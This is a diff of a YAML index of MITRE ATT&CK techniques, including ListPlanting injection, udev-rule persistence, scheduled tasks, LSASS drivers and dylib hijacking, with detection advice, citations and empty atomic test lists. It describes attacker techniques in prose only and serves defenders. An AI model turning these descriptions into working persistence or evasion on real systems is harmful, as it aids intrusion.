-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23257,6 +23487,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23271,21 +23504,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23330,9 +23594,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23389,8 +23652,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23399,7 +23662,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23441,7 +23703,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23466,12 +23728,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23511,8 +23772,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23520,13 +23783,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23557,17 +23820,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -23630,7 +23890,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -23664,8 +23924,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -23674,6 +23934,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -23686,7 +23950,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -23789,9 +24052,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -23827,7 +24148,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -23851,12 +24172,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -23940,11 +24260,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -23996,9 +24315,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24047,7 +24365,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24085,30 +24403,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24155,7 +24472,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24187,8 +24504,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24202,6 +24519,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24214,16 +24535,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24289,7 +24613,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24366,66 +24689,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24438,31 +24706,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
